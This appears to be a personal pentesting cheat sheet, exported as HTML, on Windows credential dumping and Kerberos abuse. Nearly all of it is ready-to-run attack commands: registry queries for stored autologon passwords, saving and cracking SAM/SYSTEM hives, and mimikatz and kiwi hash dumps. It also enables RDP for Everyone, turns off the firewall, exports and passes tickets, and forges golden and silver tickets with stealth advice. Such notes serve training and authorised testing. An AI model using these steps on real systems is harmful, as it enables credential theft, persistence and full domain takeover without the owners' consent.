<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>mimikatz/hashdump</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>mimikatz/hashdump</h1>

      <div class="ck-content">
        <h2>Registry</h2>

        <p><code>REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /s</code> to
          view autologon stored passwords</p>
         <h2>SAM and SYSTEM</h2>

        <p><code>reg save HKLM\SAM C:\Users\Administrator\Desktop\SAM</code>

        </p>
        <p><code>reg save HKLM\SYSTEM C:\Users\Administrator\Desktop\SYSTEM</code>

        </p>
        <p><code>samdump2 SYSTEM SAM</code>

        </p>
         <h2>KIWI</h2>

        <p><code>load kiwi</code>

        </p>
        <p><code>lsa_dump_sam</code>

        </p>
        <p><code>getsystem</code> if not running as SYSTEM</p><pre><code class="language-text-plain">reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections  /t REG_DWORD /d 0 /f</code></pre>

         <h2>Mimikatz</h2>

        <p>run mimikatz.exe(used for dumping password hashes)</p>
        <p>to activate rdp from terminal, use:</p><pre><code class="language-text-plain">reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f</code></pre><pre><code class="language-text-plain">net localgroup "Remote Desktop Users" Everyone /add</code></pre><pre><code class="language-text-plain">netsh advfirewall set allprofiles state off #to disable firewall</code></pre><pre><code class="language-text-plain">lsadump::cache /user:user /pass:Password123! /kiwi</code></pre>

        <p><code>privilege::debug</code>

        </p>
        <p><code>sekurlsa::tickets /export </code> this will export all of the .kirbi
          tickets into the directory that you are currently in</p>
        <p><code>kerberos::ptt &lt;ticket&gt; </code> try using an admin ticket for
          impersonation</p>
        <p><code>klist</code> to ensure we successfully impersonated the ticket by
          listing our cached tickets.</p>
        <p>A silver ticket can sometimes be better used in engagements rather than
          a golden ticket because it is a little more discreet. If stealth and staying
          undetected matter then a silver ticket is probably a better option than
          a golden ticket however the approach to creating one is the exact same.
          The key difference between the two tickets is that a silver ticket is limited
          to the service that is targeted whereas a golden ticket has access to any
          Kerberos service.</p>
        <p>for a golden ticket you would dump the krbtgt ticket and for a silver
          ticket, you would dump any service or domain admin ticket.</p>
        <p><code>lsadump::lsa /inject /name:krbtgt</code> - This will dump the hash
          as well as the security identifier needed to create a Golden Ticket. To
          create a silver ticket you need to change the /name: to dump the hash of
          either a domain admin account or a service account such as the SQLService
          account.</p>
        <p><code>Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:</code>

        </p>
        <p>- This is the command for creating a golden ticket to create a silver
          ticket simply put a service NTLM hash into the krbtgt slot, the sid of
          the service account into sid, and change the id to 1103.</p>
        <p>Access machines that you want, what you can access will depend on the
          privileges of the user that you decided to take the ticket from however
          if you took the ticket from krbtgt you have access to the ENTIRE network
          hence the name golden ticket;</p>
      </div>
    </div>
  </body>

</html>